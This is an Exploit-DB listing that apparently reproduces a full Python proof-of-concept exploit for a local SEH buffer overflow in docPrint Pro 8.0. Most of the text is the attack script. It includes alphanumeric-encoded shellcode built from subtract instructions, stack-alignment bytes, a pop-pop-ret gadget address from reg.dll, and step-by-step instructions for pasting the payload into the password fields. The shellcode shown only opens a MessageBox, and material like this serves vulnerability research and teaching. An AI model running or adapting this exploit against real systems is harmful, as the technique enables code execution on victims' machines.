docPrint Pro 8.0 - SEH Buffer Overflow

EDB-ID:

47394

CVE:

N/A




Platform:

Windows

Date:

2019-09-16


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7


# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"

# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)

# Zero out registers for calculations.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"

# Stack alignment
alignment = "\x54"				# push esp
alignment += "\x58"				# pop eax
alignment += "\x2d\x1a\x50\x55\x55"		# sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55"		# sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55"		# sub eax, 0x1a4e5555
alignment += "\x50"				# push eax
alignment += "\x5c" 				# pop esp

# Custom created and encoded MessageBox POC shellcode.
# Utilized aplication DLL with no ASLR for Windows API call to MessageBox function.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41

# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero				# zero out eax
shellcode += "\x2d\x55\x15\x4f\x53"		# sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53"		# sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53"		# sub eax, 0x53500157
shellcode += "\x50"				# push eax

# 4F554A42 4F554A42 51554B44
shellcode += zero				# zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f"		# sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f"		# sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51"		# sub eax, 0x51554b44
shellcode += "\x50"				# push eax

# 153A393A 153A393A 173B3B3B
shellcode += zero
shellcode += "\x2d\x3a\x39\x3a\x15"		# sub eax, 0x173b3b3b
shellcode += "\x2d\x3a\x39\x3a\x15"		# sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17"		# sub eax, 0x173b3b3b
shellcode += "\x50"				# push eax

# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero				# zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a"		# sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a"		# sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b"		# sub eax, 0x3b3b0229
shellcode += "\x50"				# push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero				# zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f"		# sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f"		# sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40"		# sub eax, 0x403d4040
shellcode += "\x50"				# push eax

# 323A1A27 323A0227 333B0229
shellcode += zero				# zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32"		# sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32"		# sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33"		# sub eax, 0x333b0229
shellcode += "\x50"				# push eax

# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero                               # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f"             # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f"             # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40"             # sub eax, 0x403d4040
shellcode += "\x50"                             # push eax

# 323A1545 323A1545 333B1545
shellcode += zero				# zero out eax
shellcode += "\x2d\x45\x15\x3a\x32"		# sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32"		# sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33"		# sub eax, 0x333b1545
shellcode += "\x50" 				# push eax

# Let's roll.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06"			# JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874)	# pop ebp pop ebx ret reg.dll
payload += "\x41" * 2				# Padding to reach alignment
payload += alignment
payload += shellcode
payload += "\x45" * (6000-len(payload))

# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()